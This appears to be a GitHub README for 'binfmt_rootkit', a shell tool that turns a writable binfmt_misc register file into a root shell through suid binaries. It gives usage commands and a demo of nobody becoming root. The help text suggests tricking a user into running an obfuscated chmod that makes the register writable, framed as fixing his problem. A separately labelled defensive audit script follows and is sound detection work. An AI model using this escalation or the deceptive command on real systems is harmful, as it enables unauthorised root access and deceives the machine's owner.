binfmt_misc

Kernel Support for miscellaneous (your favourite) exploits

Primary language: Shell. License: GNU General Public License v3.0 (GPL-3.0).

No breakthrough here, just some trivia involving binary formats.

binfmt_rootkit

Poor man's rootkit: it leverages binfmt_misc's credentials option to escalate privileges through any suid binary (and to get a root shell) if /proc/sys/fs/binfmt_misc/register is writable.

$ git clone https://github.com/plcp/binfmt_misc
$ cd binfmt_misc
$ ./binfmt_rootkit --help
Usage: ./binfmt_rootkit
    Gives you a root shell if /proc/sys/fs/binfmt_misc/register is writeable,
    note that it must be enforced by any other mean before your try this, for
    example by typing something like "sudo chmod +6 /*/*/f*/*/*r" while Dave
    is thinking that you are fixing his problem.

Cheap nobody to root is cheap:

$ sudo -u nobody ./binfmt_rootkit
uid=0(root) euid=0(root)
sh-4.4#

Tested on Linux 4.9.6-1; works on major distributions.
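
A defender-side check for the condition this tool depends on, as an added example that is not part of the repository: it flags a register file writable by group or others and lists handlers registered with the C (credentials) flag. The function names and the --live switch are assumptions of this example; the "flags:" and "interpreter" lines are the ones the kernel prints for each registered handler.

```sh
#!/bin/sh
# Added defensive audit (not part of the repository). Paths and file format
# follow the kernel's binfmt_misc interface; function names are this example's.
BINFMT_DIR="${BINFMT_DIR:-/proc/sys/fs/binfmt_misc}"

# Succeeds (finding) when <dir>/register is writable by group or others.
register_is_exposed() {
    reg="$1/register"
    [ -e "$reg" ] || return 1
    mode=$(ls -ld "$reg" | cut -c1-10)      # e.g. "--w-------" when healthy
    case "$mode" in
        ?????w*|????????w*) return 0 ;;     # group-write or other-write bit
    esac
    return 1
}

# Prints "name<TAB>interpreter" for each handler whose "flags:" line has C,
# i.e. credentials come from the executed binary rather than the interpreter.
credential_handlers() {
    for entry in "$1"/*; do
        [ -f "$entry" ] || continue
        case "${entry##*/}" in register|status) continue ;; esac
        if grep -q '^flags:.*C' "$entry" 2>/dev/null; then
            interp=$(sed -n 's/^interpreter //p' "$entry")
            printf '%s\t%s\n' "${entry##*/}" "$interp"
        fi
    done
}

# Returns non-zero when either check produces something to review.
audit() {
    rc=0
    if register_is_exposed "$1"; then
        echo "FINDING: $1/register is writable by non-root users"
        rc=1
    fi
    handlers=$(credential_handlers "$1")
    if [ -n "$handlers" ]; then
        echo "REVIEW: handlers registered with the C (credentials) flag:"
        echo "$handlers"
        rc=1
    fi
    return "$rc"
}

# Audit the live system only when invoked with --live.
if [ "${1:-}" = "--live" ]; then audit "$BINFMT_DIR"; fi
```

A C-flagged handler is not necessarily malicious, so the second check is a review list: confirm each interpreter path is one you installed.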